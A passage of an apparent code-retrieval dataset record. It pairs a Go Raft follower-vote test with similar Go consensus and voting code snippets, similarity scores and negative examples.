RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here.\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\n\tmay_grant_vote := true\n\tif len(rf.logs) > 0 {\n\t\t// rf.logs_term[len(rf.logs)-1] will always there, no matter snapshotedCount\n\t\tif rf.logs_term[len(rf.logs)-1] > args.LastLogTerm ||\n\t\t\t(rf.logs_term[len(rf.logs)-1] == args.LastLogTerm && len(rf.logs) > args.LogCount) {\n\t\t\tmay_grant_vote = false\n\t\t}\n\t}\n\trf.logger.Printf(\"Got vote request: %v, may grant vote: %v\\n\", args, may_grant_vote)\n\n\tif args.Term < rf.currentTerm {\n\t\trf.logger.Printf(\"Got vote request with term = %v, reject\\n\", args.Term)\n\t\treply.Term = rf.currentTerm\n\t\treply.Granted = false\n\t\treturn\n\t}\n\n\tif args.Term == rf.currentTerm {\n\t\trf.logger.Printf(\"Got vote request with current term, now voted for %v\\n\", rf.votedFor)\n\t\tif rf.votedFor == -1 && may_grant_vote {\n\t\t\trf.votedFor = args.CandidateID\n\t\t\trf.persist()\n\t\t}\n\t\treply.Granted = (rf.votedFor == args.CandidateID)\n\t\treply.Term = rf.currentTerm\n\t\treturn\n\t}\n\tif args.Term > rf.currentTerm {\n\t\trf.logger.Printf(\"Got vote request with term = %v, follow it\\n\", args.Term)\n\t\trf.state = FOLLOWER\n\t\trf.currentTerm = args.Term\n\t\trf.votedFor = -1\n\t\tif may_grant_vote {\n\t\t\trf.votedFor = args.CandidateID\n\t\t\trf.persist()\n\t\t}\n\t\trf.resetTimer()\n\n\t\treply.Granted = (rf.votedFor == args.CandidateID)\n\t\treply.Term = args.Term\n\t\treturn\n\t}\n}", "func (w *pollWorker) handleVoteForActivePeer(voter net.Addr, vote VoteMsg) bool {\n\n\t// compare the round\n\tcompareRound := w.compareRound(vote)\n\n\tif compareRound == common.EQUAL {\n\t\t// If I recieve a vote with the same round, then it could mean\n\t\t// that an esemble is forming from a set of electing peers. Add\n\t\t// this vote to the list of received votes. All the received votes\n\t\t// are from the same round. If we get a quorum from the received\n\t\t// votes, then announce the result.\n\t\t// NOTE: ZK does not check the epoch nor update the proposed vote upon\n\t\t// receiving a vote from an active member (unlike receiving a vote from\n\t\t// electing peer). This implies that if this is a rogue vote (a node\n\t\t// sends out a vote and the ensemble loses majority), the election alogrithm\n\t\t// will not get affected -- it can still converge if there is majority of\n\t\t// electing peer to reach quorum. If the established ensmeble remains stable,\n\t\t// then there should be enough active member responds to me and I will\n\t\t// eventually reach quorum (based on ballot.result.activePeers -- see below).\n\t\tw.ballot.result.receivedVotes[voter.String()] = vote\n\n\t\tif w.checkQuorum(w.ballot.result.receivedVotes, vote) && w.certifyLeader(vote) {\n\t\t\t// accept this vote from the peer\n\t\t\tw.ballot.updateProposed(vote, w.site)\n\t\t\treturn true\n\t\t}\n\t}\n\n\t// The active peer has chosen a leader, but we cannot confirm it yet.\n\t// Keep the active peer onto a different list, since receivedVotes\n\t// can be reset (all received votes must be from the same round).\n\t// If this peer goes down after sending us his vote, his vote still count\n\t// in this ballot. By calling certifyLeader(), we can also makes sure that\n\t// the candidate has established itself to us as a leader.\n\tw.ballot.result.activePeers[voter.String()] = vote\n\n\t// Check the quorum only for the active peers. In this case, the vote\n\t// can have a different round than mime. There may already be an established\n\t// ensemble and I am merely trying to join them.\n\tif w.checkQuorum(w.ballot.result.activePeers, vote) && w.certifyLeader(vote) {\n\n\t\tw.ballot.updateProposed(vote, w.site)\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here (2A, 2B).\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\tdefer rf.persist()\n\n\tif args.Term < rf.currentTerm {\n\t\t\treply.Term = rf.currentTerm\n\t\t\treply.VoteGranted = false\n\t\t\treturn\n\t\t}\n\tif args.Term > rf.currentTerm{\n\t\trf.currentTerm = args.Term\n\t\trf.votedFor = -1\n\t\trf.role = 0\n\t\trf.roleChan <- 0\n\t\t}\n\treply.Term = args.Term\n\tfmt.Printf(\"LastLogTerm:%v rf.log:%v sever:%v \\n\", args.LastLogTerm, rf.log[len(rf.log)-1].Term, rf.me)\n\tif rf.votedFor != -1 && rf.votedFor != args.CandidateId {\n\t reply.VoteGranted = false \n\t }else if rf.log[len(rf.log)-1].Term > args.LastLogTerm{\n\t \treply.VoteGranted = false\n\t }else if rf.log[len(rf.log)-1].Index > args.LastLogIndex && rf.log[len(rf.log)-1].Term == args.LastLogTerm{\n\t \treply.VoteGranted = false\n\t }else{\n\t fmt.Printf(\"Server %v vote for server %v \\n\", rf.me, args.CandidateId)\n\t reply.VoteGranted = true\n\t rf.votedFor = args.CandidateId\n\t rf.GrantVote <- true\n\t }\n\n\t}", "func (rf *Raft) sendRequestVote(server int, args RequestVoteArgs, reply *RequestVoteReply) bool {\n\tok := rf.peers[server].Call(\"Raft.RequestVote\", args, reply)\n\trf.mtx.Lock()\n\tdefer rf.mtx.Unlock()\n\n\tif ok {\n\t\tif rf.state != STATE_CANDIDATE {\n\t\t\treturn ok\n\t\t}\n\t\tif args.Term != rf.currentTerm { // consider the current term's reply\n\t\t\treturn ok\n\t\t}\n\t\tif reply.Term > rf.currentTerm {\n\t\t\trf.currentTerm = reply.Term\n\t\t\trf.state = STATE_FOLLOWER\n\t\t\trf.voteFor = -1\n\t\t\trf.persist()\n\t\t}\n\t\tif reply.VoteGranted {\n\t\t\trf.beenVotedCount++\n\t\t\tif rf.state == STATE_CANDIDATE && rf.beenVotedCount > len(rf.peers)/2 {\n\t\t\t\trf.state = STATE_FOLLOWER // ...\n\t\t\t\trf.chanBecomeLeader <- 1\n\t\t\t}\n\t\t}\n\t}\n\n\treturn ok\n}" ]
[ "0.712777", "0.6818168", "0.65368366", "0.64485717", "0.6448258", "0.64238167", "0.6404896", "0.63321364", "0.6317073", "0.6308467", "0.62964714", "0.62061626", "0.61874914", "0.61642045", "0.6135719", "0.61182326", "0.6116993", "0.61055106", "0.6050055", "0.6028388", "0.6019968", "0.6012005", "0.60047483", "0.5987077", "0.5977117", "0.5974031", "0.5938882", "0.59173876", "0.58873737", "0.58836764", "0.58833003", "0.58722985", "0.583001", "0.58208317", "0.5818842", "0.5811867", "0.5810055", "0.5805495", "0.5803311", "0.5767662", "0.57353187", "0.57329273", "0.57012165", "0.56873983", "0.5655232", "0.56486076", "0.5638926", "0.5637188", "0.5629001", "0.5599971", "0.55940497", "0.55914545", "0.55820394", "0.5573898", "0.5546701", "0.55362564", "0.5515346", "0.55125296", "0.550955", "0.5503636", "0.547376", "0.5460859", "0.545332", "0.5453087", "0.54450023", "0.5424743", "0.5423875", "0.5422573", "0.54195756", "0.539311", "0.53893584", "0.5388931", "0.5382678", "0.53796285", "0.53766483", "0.5373278", "0.53681344", "0.53653437", "0.53645027", "0.5345583", "0.5333734", "0.532675", "0.53252953", "0.53157544", "0.5305897", "0.52831423", "0.52813", "0.5280349", "0.5275988", "0.5272226", "0.5267415", "0.5266163", "0.525774", "0.52534616", "0.5253106", "0.5249979", "0.5247782", "0.5229487", "0.5224935", "0.5216286" ]
0.83975685
0
TestFollowerVote tests that each follower will vote for at most one candidate in a given term, on a firstcomefirstserved basis. Reference: section 5.2
func TestFollowerVote(t *testing.T) { tests := []struct { vote uint64 nvote uint64 wreject bool }{ {None, 1, false}, {None, 2, false}, {1, 1, false}, {2, 2, false}, {1, 2, true}, {2, 1, true}, } for i, tt := range tests { r := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage()) defer closeAndFreeRaft(r) r.loadState(pb.HardState{Term: 1, Vote: tt.vote}) r.Step(pb.Message{From: tt.nvote, FromGroup: pb.Group{NodeId: tt.nvote, GroupId: 1, RaftReplicaId: tt.nvote}, To: 1, ToGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1}, Term: 1, Type: pb.MsgVote}) msgs := r.readMessages() wmsgs := []pb.Message{ {From: 1, FromGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1}, To: tt.nvote, ToGroup: pb.Group{NodeId: tt.nvote, GroupId: 1, RaftReplicaId: tt.nvote}, Term: 1, Type: pb.MsgVoteResp, Reject: tt.wreject}, } if !reflect.DeepEqual(msgs, wmsgs) { t.Errorf("#%d: msgs = %v, want %v", i, msgs, wmsgs) } } }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func TestPreVoteWithSplitVote(t *testing.T) {\n\tn1 := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tn2 := newTestRaft(2, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tn3 := newTestRaft(3, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(n1)\n\tdefer closeAndFreeRaft(n2)\n\tdefer closeAndFreeRaft(n3)\n\n\tn1.becomeFollower(1, None)\n\tn2.becomeFollower(1, None)\n\tn3.becomeFollower(1, None)\n\n\tn1.preVote = true\n\tn2.preVote = true\n\tn3.preVote = true\n\n\tnt := newNetwork(n1, n2, n3)\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\t// simulate leader down. followers start split vote.\n\tnt.isolate(1)\n\tnt.send([]pb.Message{\n\t\t{From: 2, To: 2, Type: pb.MsgHup},\n\t\t{From: 3, To: 3, Type: pb.MsgHup},\n\t}...)\n\n\t// check whether the term values are expected\n\t// n2.Term == 3\n\t// n3.Term == 3\n\tsm := nt.peers[2].(*raft)\n\tif sm.Term != 3 {\n\t\tt.Errorf(\"peer 2 term: %d, want %d\", sm.Term, 3)\n\t}\n\tsm = nt.peers[3].(*raft)\n\tif sm.Term != 3 {\n\t\tt.Errorf(\"peer 3 term: %d, want %d\", sm.Term, 3)\n\t}\n\n\t// check state\n\t// n2 == candidate\n\t// n3 == candidate\n\tsm = nt.peers[2].(*raft)\n\tif sm.state != StateCandidate {\n\t\tt.Errorf(\"peer 2 state: %s, want %s\", sm.state, StateCandidate)\n\t}\n\tsm = nt.peers[3].(*raft)\n\tif sm.state != StateCandidate {\n\t\tt.Errorf(\"peer 3 state: %s, want %s\", sm.state, StateCandidate)\n\t}\n\n\t// node 2 election timeout first\n\tnt.send(pb.Message{From: 2, To: 2, Type: pb.MsgHup})\n\n\t// check whether the term values are expected\n\t// n2.Term == 4\n\t// n3.Term == 4\n\tsm = nt.peers[2].(*raft)\n\tif sm.Term != 4 {\n\t\tt.Errorf(\"peer 2 term: %d, want %d\", sm.Term, 4)\n\t}\n\tsm = nt.peers[3].(*raft)\n\tif sm.Term != 4 {\n\t\tt.Errorf(\"peer 3 term: %d, want %d\", sm.Term, 4)\n\t}\n\n\t// check state\n\t// n2 == leader\n\t// n3 == follower\n\tsm = nt.peers[2].(*raft)\n\tif sm.state != StateLeader {\n\t\tt.Errorf(\"peer 2 state: %s, want %s\", sm.state, StateLeader)\n\t}\n\tsm = nt.peers[3].(*raft)\n\tif sm.state != StateFollower {\n\t\tt.Errorf(\"peer 3 state: %s, want %s\", sm.state, StateFollower)\n\t}\n}", "func TestLeaderElectionInOneRoundRPC(t *testing.T) {\n\ttests := []struct {\n\t\tsize int\n\t\tvotes map[uint64]bool\n\t\tstate StateType\n\t}{\n\t\t// win the election when receiving votes from a majority of the servers\n\t\t{1, map[uint64]bool{}, StateLeader},\n\t\t{3, map[uint64]bool{2: true, 3: true}, StateLeader},\n\t\t{3, map[uint64]bool{2: true}, StateLeader},\n\t\t{5, map[uint64]bool{2: true, 3: true, 4: true, 5: true}, StateLeader},\n\t\t{5, map[uint64]bool{2: true, 3: true, 4: true}, StateLeader},\n\t\t{5, map[uint64]bool{2: true, 3: true}, StateLeader},\n\n\t\t// return to follower state if it receives vote denial from a majority\n\t\t{3, map[uint64]bool{2: false, 3: false}, StateFollower},\n\t\t{5, map[uint64]bool{2: false, 3: false, 4: false, 5: false}, StateFollower},\n\t\t{5, map[uint64]bool{2: true, 3: false, 4: false, 5: false}, StateFollower},\n\n\t\t// stay in candidate if it does not obtain the majority\n\t\t{3, map[uint64]bool{}, StateCandidate},\n\t\t{5, map[uint64]bool{2: true}, StateCandidate},\n\t\t{5, map[uint64]bool{2: false, 3: false}, StateCandidate},\n\t\t{5, map[uint64]bool{}, StateCandidate},\n\t}\n\tfor i, tt := range tests {\n\t\tr := newTestRaft(1, idsBySize(tt.size), 10, 1, NewMemoryStorage())\n\t\tdefer closeAndFreeRaft(r)\n\n\t\tr.Step(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\t\tfor id, vote := range tt.votes {\n\t\t\tr.Step(pb.Message{From: id, To: 1, Term: r.Term, Type: pb.MsgVoteResp, Reject: !vote})\n\t\t}\n\n\t\tif r.state != tt.state {\n\t\t\tt.Errorf(\"#%d: state = %s, want %s\", i, r.state, tt.state)\n\t\t}\n\t\tif g := r.Term; g != 1 {\n\t\t\tt.Errorf(\"#%d: term = %d, want %d\", i, g, 1)\n\t\t}\n\t}\n}", "func TestPreVoteWithCheckQuorum(t *testing.T) {\n\tn1 := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tn2 := newTestRaft(2, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tn3 := newTestRaft(3, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\n\tn1.becomeFollower(1, None)\n\tn2.becomeFollower(1, None)\n\tn3.becomeFollower(1, None)\n\n\tn1.preVote = true\n\tn2.preVote = true\n\tn3.preVote = true\n\n\tn1.checkQuorum = true\n\tn2.checkQuorum = true\n\tn3.checkQuorum = true\n\n\tnt := newNetwork(n1, n2, n3)\n\tdefer nt.closeAll()\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\t// isolate node 1. node 2 and node 3 have leader info\n\tnt.isolate(1)\n\n\t// check state\n\tsm := nt.peers[1].(*raft)\n\tif sm.state != StateLeader {\n\t\tt.Fatalf(\"peer 1 state: %s, want %s\", sm.state, StateLeader)\n\t}\n\tsm = nt.peers[2].(*raft)\n\tif sm.state != StateFollower {\n\t\tt.Fatalf(\"peer 2 state: %s, want %s\", sm.state, StateFollower)\n\t}\n\tsm = nt.peers[3].(*raft)\n\tif sm.state != StateFollower {\n\t\tt.Fatalf(\"peer 3 state: %s, want %s\", sm.state, StateFollower)\n\t}\n\n\t// node 2 will ignore node 3's PreVote\n\tnt.send(pb.Message{From: 3, To: 3, Type: pb.MsgHup})\n\tnt.send(pb.Message{From: 2, To: 2, Type: pb.MsgHup})\n\n\t// Do we have a leader?\n\tif n2.state != StateLeader && n3.state != StateFollower {\n\t\tt.Errorf(\"no leader\")\n\t}\n}", "func TestVoting(t *testing.T) {\n\t// Define the various voting scenarios to test\n\ttests := []struct {\n\t\tepoch uint64\n\t\tvalidators []string\n\t\tvotes []testerVote\n\t\tresults []string\n\t}{\n\t\t{\n\t\t\t// Single validator, no votes cast\n\t\t\tvalidators: []string{\"A\"},\n\t\t\tvotes: []testerVote{{validator: \"A\"}},\n\t\t\tresults: []string{\"A\"},\n\t\t}, {\n\t\t\t// Single validator, voting to add two others (only accept first, second needs 2 votes)\n\t\t\tvalidators: []string{\"A\"},\n\t\t\tvotes: []testerVote{\n\t\t\t\t{validator: \"A\", voted: \"B\", auth: true},\n\t\t\t\t{validator: \"B\"},\n\t\t\t\t{validator: \"A\", voted: \"C\", auth: true},\n\t\t\t},\n\t\t\tresults: []string{\"A\", \"B\"},\n\t\t}, {\n\t\t\t// Two validators, voting to add three others (only accept first two, third needs 3 votes already)\n\t\t\tvalidators: []string{\"A\", \"B\"},\n\t\t\tvotes: []testerVote{\n\t\t\t\t{validator: \"A\", voted: \"C\", auth: true},\n\t\t\t\t{validator: \"B\", voted: \"C\", auth: true},\n\t\t\t\t{validator: \"A\", voted: \"D\", auth: true},\n\t\t\t\t{validator: \"B\", voted: \"D\", auth: true},\n\t\t\t\t{validator: \"C\"},\n\t\t\t\t{validator: \"A\", voted: \"E\", auth: true},\n\t\t\t\t{validator: \"B\", voted: \"E\", auth: true},\n\t\t\t},\n\t\t\tresults: []string{\"A\", \"B\", \"C\", \"D\"},\n\t\t}, {\n\t\t\t// Single validator, dropping itself (weird, but one less cornercase by explicitly allowing this)\n\t\t\tvalidators: []string{\"A\"},\n\t\t\tvotes: []testerVote{\n\t\t\t\t{validator: \"A\", voted: \"A\", auth: false},\n\t\t\t},\n\t\t\tresults: []string{},\n\t\t}, {\n\t\t\t// Two validators, actually needing mutual consent to drop either of them (not fulfilled)\n\t\t\tvalidators: []string{\"A\", \"B\"},\n\t\t\tvotes: []testerVote{\n\t\t\t\t{validator: \"A\", voted: \"B\", auth: false},\n\t\t\t},\n\t\t\tresults: []string{\"A\", \"B\"},\n\t\t}, {\n\t\t\t// Two validators, actually needing mutual consent to drop either of them (fulfilled)\n\t\t\tvalidators: []string{\"A\", \"B\"},\n\t\t\tvotes: []testerVote{\n\t\t\t\t{validator: \"A\", voted: \"B\", auth: false},\n\t\t\t\t{validator: \"B\", voted: \"B\", auth: false},\n\t\t\t},\n\t\t\tresults: []string{\"A\"},\n\t\t}, {\n\t\t\t// Three validators, two of them deciding to drop the third\n\t\t\tvalidators: []string{\"A\", \"B\", \"C\"},\n\t\t\tvotes: []testerVote{\n\t\t\t\t{validator: \"A\", voted: \"C\", auth: false},\n\t\t\t\t{validator: \"B\", voted: \"C\", auth: false},\n\t\t\t},\n\t\t\tresults: []string{\"A\", \"B\"},\n\t\t}, {\n\t\t\t// Four validators, consensus of two not being enough to drop anyone\n\t\t\tvalidators: []string{\"A\", \"B\", \"C\", \"D\"},\n\t\t\tvotes: []testerVote{\n\t\t\t\t{validator: \"A\", voted: \"C\", auth: false},\n\t\t\t\t{validator: \"B\", voted: \"C\", auth: false},\n\t\t\t},\n\t\t\tresults: []string{\"A\", \"B\", \"C\", \"D\"},\n\t\t}, {\n\t\t\t// Four validators, consensus of three already being enough to drop someone\n\t\t\tvalidators: []string{\"A\", \"B\", \"C\", \"D\"},\n\t\t\tvotes: []testerVote{\n\t\t\t\t{validator: \"A\", voted: \"D\", auth: false},\n\t\t\t\t{validator: \"B\", voted: \"D\", auth: false},\n\t\t\t\t{validator: \"C\", voted: \"D\", auth: false},\n\t\t\t},\n\t\t\tresults: []string{\"A\", \"B\", \"C\"},\n\t\t}, {\n\t\t\t// Authorizations are counted once per validator per target\n\t\t\tvalidators: []string{\"A\", \"B\"},\n\t\t\tvotes: []testerVote{\n\t\t\t\t{validator: \"A\", voted: \"C\", auth: true},\n\t\t\t\t{validator: \"B\"},\n\t\t\t\t{validator: \"A\", voted: \"C\", auth: true},\n\t\t\t\t{validator: \"B\"},\n\t\t\t\t{validator: \"A\", voted: \"C\", auth: true},\n\t\t\t},\n\t\t\tresults: []string{\"A\", \"B\"},\n\t\t}, {\n\t\t\t// Authorizing multiple accounts concurrently is permitted\n\t\t\tvalidators: []string{\"A\", \"B\"},\n\t\t\tvotes: []testerVote{\n\t\t\t\t{validator: \"A\", voted: \"C\", auth: true},\n\t\t\t\t{validator: \"B\"},\n\t\t\t\t{validator: \"A\", voted: \"D\", auth: true},\n\t\t\t\t{validator: \"B\"},\n\t\t\t\t{validator: \"A\"},\n\t\t\t\t{validator: \"B\", voted: \"D\", auth: true},\n\t\t\t\t{validator: \"A\"},\n\t\t\t\t{validator: \"B\", voted: \"C\", auth: true},\n\t\t\t},\n\t\t\tresults: []string{\"A\", \"B\", \"C\", \"D\"},\n\t\t}, {\n\t\t\t// Deauthorizations are counted once per validator per target\n\t\t\tvalidators: []string{\"A\", \"B\"},\n\t\t\tvotes: []testerVote{\n\t\t\t\t{validator: \"A\", voted: \"B\", auth: false},\n\t\t\t\t{validator: \"B\"},\n\t\t\t\t{validator: \"A\", voted: \"B\", auth: false},\n\t\t\t\t{validator: \"B\"},\n\t\t\t\t{validator: \"A\", voted: \"B\", auth: false},\n\t\t\t},\n\t\t\tresults: []string{\"A\", \"B\"},\n\t\t}, {\n\t\t\t// Deauthorizing multiple accounts concurrently is permitted\n\t\t\tvalidators: []string{\"A\", \"B\", \"C\", \"D\"},\n\t\t\tvotes: []testerVote{\n\t\t\t\t{validator: \"A\", voted: \"C\", auth: false},\n\t\t\t\t{validator: \"B\"},\n\t\t\t\t{validator: \"C\"},\n\t\t\t\t{validator: \"A\", voted: \"D\", auth: false},\n\t\t\t\t{validator: \"B\"},\n\t\t\t\t{validator: \"C\"},\n\t\t\t\t{validator: \"A\"},\n\t\t\t\t{validator: \"B\", voted: \"D\", auth: false},\n\t\t\t\t{validator: \"C\", voted: \"D\", auth: false},\n\t\t\t\t{validator: \"A\"},\n\t\t\t\t{validator: \"B\", voted: \"C\", auth: false},\n\t\t\t},\n\t\t\tresults: []string{\"A\", \"B\"},\n\t\t}, {\n\t\t\t// Votes from deauthorized validators are discarded immediately (deauth votes)\n\t\t\tvalidators: []string{\"A\", \"B\", \"C\"},\n\t\t\tvotes: []testerVote{\n\t\t\t\t{validator: \"C\", voted: \"B\", auth: false},\n\t\t\t\t{validator: \"A\", voted: \"C\", auth: false},\n\t\t\t\t{validator: \"B\", voted: \"C\", auth: false},\n\t\t\t\t{validator: \"A\", voted: \"B\", auth: false},\n\t\t\t},\n\t\t\tresults: []string{\"A\", \"B\"},\n\t\t}, {\n\t\t\t// Votes from deauthorized validators are discarded immediately (auth votes)\n\t\t\tvalidators: []string{\"A\", \"B\", \"C\"},\n\t\t\tvotes: []testerVote{\n\t\t\t\t{validator: \"C\", voted: \"B\", auth: false},\n\t\t\t\t{validator: \"A\", voted: \"C\", auth: false},\n\t\t\t\t{validator: \"B\", voted: \"C\", auth: false},\n\t\t\t\t{validator: \"A\", voted: \"B\", auth: false},\n\t\t\t},\n\t\t\tresults: []string{\"A\", \"B\"},\n\t\t}, {\n\t\t\t// Cascading changes are not allowed, only the the account being voted on may change\n\t\t\tvalidators: []string{\"A\", \"B\", \"C\", \"D\"},\n\t\t\tvotes: []testerVote{\n\t\t\t\t{validator: \"A\", voted: \"C\", auth: false},\n\t\t\t\t{validator: \"B\"},\n\t\t\t\t{validator: \"C\"},\n\t\t\t\t{validator: \"A\", voted: \"D\", auth: false},\n\t\t\t\t{validator: \"B\", voted: \"C\", auth: false},\n\t\t\t\t{validator: \"C\"},\n\t\t\t\t{validator: \"A\"},\n\t\t\t\t{validator: \"B\", voted: \"D\", auth: false},\n\t\t\t\t{validator: \"C\", voted: \"D\", auth: false},\n\t\t\t},\n\t\t\tresults: []string{\"A\", \"B\", \"C\"},\n\t\t}, {\n\t\t\t// Changes reaching consensus out of bounds (via a deauth) execute on touch\n\t\t\tvalidators: []string{\"A\", \"B\", \"C\", \"D\"},\n\t\t\tvotes: []testerVote{\n\t\t\t\t{validator: \"A\", voted: \"C\", auth: false},\n\t\t\t\t{validator: \"B\"},\n\t\t\t\t{validator: \"C\"},\n\t\t\t\t{validator: \"A\", voted: \"D\", auth: false},\n\t\t\t\t{validator: \"B\", voted: \"C\", auth: false},\n\t\t\t\t{validator: \"C\"},\n\t\t\t\t{validator: \"A\"},\n\t\t\t\t{validator: \"B\", voted: \"D\", auth: false},\n\t\t\t\t{validator: \"C\", voted: \"D\", auth: false},\n\t\t\t\t{validator: \"A\"},\n\t\t\t\t{validator: \"C\", voted: \"C\", auth: true},\n\t\t\t},\n\t\t\tresults: []string{\"A\", \"B\"},\n\t\t}, {\n\t\t\t// Changes reaching consensus out of bounds (via a deauth) may go out of consensus on first touch\n\t\t\tvalidators: []string{\"A\", \"B\", \"C\", \"D\"},\n\t\t\tvotes: []testerVote{\n\t\t\t\t{validator: \"A\", voted: \"C\", auth: false},\n\t\t\t\t{validator: \"B\"},\n\t\t\t\t{validator: \"C\"},\n\t\t\t\t{validator: \"A\", voted: \"D\", auth: false},\n\t\t\t\t{validator: \"B\", voted: \"C\", auth: false},\n\t\t\t\t{validator: \"C\"},\n\t\t\t\t{validator: \"A\"},\n\t\t\t\t{validator: \"B\", voted: \"D\", auth: false},\n\t\t\t\t{validator: \"C\", voted: \"D\", auth: false},\n\t\t\t\t{validator: \"A\"},\n\t\t\t\t{validator: \"B\", voted: \"C\", auth: true},\n\t\t\t},\n\t\t\tresults: []string{\"A\", \"B\", \"C\"},\n\t\t}, {\n\t\t\t// Ensure that pending votes don't survive authorization status changes. This\n\t\t\t// corner case can only appear if a validator is quickly added, remove and then\n\t\t\t// readded (or the inverse), while one of the original voters dropped. If a\n\t\t\t// past vote is left cached in the system somewhere, this will interfere with\n\t\t\t// the final validator outcome.\n\t\t\tvalidators: []string{\"A\", \"B\", \"C\", \"D\", \"E\"},\n\t\t\tvotes: []testerVote{\n\t\t\t\t{validator: \"A\", voted: \"F\", auth: true}, // Authorize F, 3 votes needed\n\t\t\t\t{validator: \"B\", voted: \"F\", auth: true},\n\t\t\t\t{validator: \"C\", voted: \"F\", auth: true},\n\t\t\t\t{validator: \"D\", voted: \"F\", auth: false}, // Deauthorize F, 4 votes needed (leave A's previous vote \"unchanged\")\n\t\t\t\t{validator: \"E\", voted: \"F\", auth: false},\n\t\t\t\t{validator: \"B\", voted: \"F\", auth: false},\n\t\t\t\t{validator: \"C\", voted: \"F\", auth: false},\n\t\t\t\t{validator: \"D\", voted: \"F\", auth: true}, // Almost authorize F, 2/3 votes needed\n\t\t\t\t{validator: \"E\", voted: \"F\", auth: true},\n\t\t\t\t{validator: \"B\", voted: \"A\", auth: false}, // Deauthorize A, 3 votes needed\n\t\t\t\t{validator: \"C\", voted: \"A\", auth: false},\n\t\t\t\t{validator: \"D\", voted: \"A\", auth: false},\n\t\t\t\t{validator: \"B\", voted: \"F\", auth: true}, // Finish authorizing F, 3/3 votes needed\n\t\t\t},\n\t\t\tresults: []string{\"B\", \"C\", \"D\", \"E\", \"F\"},\n\t\t}, {\n\t\t\t// Epoch transitions reset all votes to allow chain checkpointing\n\t\t\tepoch: 3,\n\t\t\tvalidators: []string{\"A\", \"B\"},\n\t\t\tvotes: []testerVote{\n\t\t\t\t{validator: \"A\", voted: \"C\", auth: true},\n\t\t\t\t{validator: \"B\"},\n\t\t\t\t{validator: \"A\"}, // Checkpoint block, (don't vote here, it's validated outside of snapshots)\n\t\t\t\t{validator: \"B\", voted: \"C\", auth: true},\n\t\t\t},\n\t\t\tresults: []string{\"A\", \"B\"},\n\t\t},\n\t}\n\n\t// Run through the scenarios and test them\n\tfor i, tt := range tests {\n\t\t// Create the account pool and generate the initial set of validators\n\t\taccounts := newTesterAccountPool()\n\n\t\tvalidators := make([]common.Address, len(tt.validators))\n\t\tfor j, validator := range tt.validators {\n\t\t\tvalidators[j] = accounts.address(validator)\n\t\t}\n\t\tfor j := 0; j < len(validators); j++ {\n\t\t\tfor k := j + 1; k < len(validators); k++ {\n\t\t\t\tif bytes.Compare(validators[j][:], validators[k][:]) > 0 {\n\t\t\t\t\tvalidators[j], validators[k] = validators[k], validators[j]\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\tgenesis := testutils.Genesis(validators, true)\n\t\tconfig := new(istanbul.Config)\n\t\t*config = *istanbul.DefaultConfig\n\t\tconfig.TestQBFTBlock = big.NewInt(0)\n\t\tif tt.epoch != 0 {\n\t\t\tconfig.Epoch = tt.epoch\n\t\t}\n\n\t\tchain, backend := newBlockchainFromConfig(\n\t\t\tgenesis,\n\t\t\t[]*ecdsa.PrivateKey{accounts.accounts[tt.validators[0]]},\n\t\t\tconfig,\n\t\t)\n\n\t\t// Assemble a chain of headers from the cast votes\n\t\theaders := make([]*types.Header, len(tt.votes))\n\t\tfor j, vote := range tt.votes {\n\t\t\tblockNumber := big.NewInt(int64(j) + 1)\n\t\t\theaders[j] = &types.Header{\n\t\t\t\tNumber: blockNumber,\n\t\t\t\tTime: uint64(int64(j) * int64(config.GetConfig(blockNumber).BlockPeriod)),\n\t\t\t\tCoinbase: accounts.address(vote.validator),\n\t\t\t\tDifficulty: istanbulcommon.DefaultDifficulty,\n\t\t\t\tMixDigest: types.IstanbulDigest,\n\t\t\t}\n\t\t\t_ = qbftengine.ApplyHeaderQBFTExtra(\n\t\t\t\theaders[j],\n\t\t\t\tqbftengine.WriteValidators(validators),\n\t\t\t)\n\n\t\t\tif j > 0 {\n\t\t\t\theaders[j].ParentHash = headers[j-1].Hash()\n\t\t\t}\n\n\t\t\tcopy(headers[j].Extra, genesis.ExtraData)\n\n\t\t\tif len(vote.voted) > 0 {\n\t\t\t\tif err := accounts.writeValidatorVote(headers[j], vote.validator, vote.voted, vote.auth); err != nil {\n\t\t\t\t\tt.Errorf(\"Error writeValidatorVote test: %d, validator: %s, voteType: %v (err=%v)\", j, vote.voted, vote.auth, err)\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\t// Pass all the headers through clique and ensure tallying succeeds\n\t\thead := headers[len(headers)-1]\n\n\t\tsnap, err := backend.snapshot(chain, head.Number.Uint64(), head.Hash(), headers)\n\t\tif err != nil {\n\t\t\tt.Errorf(\"test %d: failed to create voting snapshot: %v\", i, err)\n\t\t\tbackend.Stop()\n\t\t\tcontinue\n\t\t}\n\t\t// Verify the final list of validators against the expected ones\n\t\tvalidators = make([]common.Address, len(tt.results))\n\t\tfor j, validator := range tt.results {\n\t\t\tvalidators[j] = accounts.address(validator)\n\t\t}\n\t\tfor j := 0; j < len(validators); j++ {\n\t\t\tfor k := j + 1; k < len(validators); k++ {\n\t\t\t\tif bytes.Compare(validators[j][:], validators[k][:]) > 0 {\n\t\t\t\t\tvalidators[j], validators[k] = validators[k], validators[j]\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\tresult := snap.validators()\n\t\tif len(result) != len(validators) 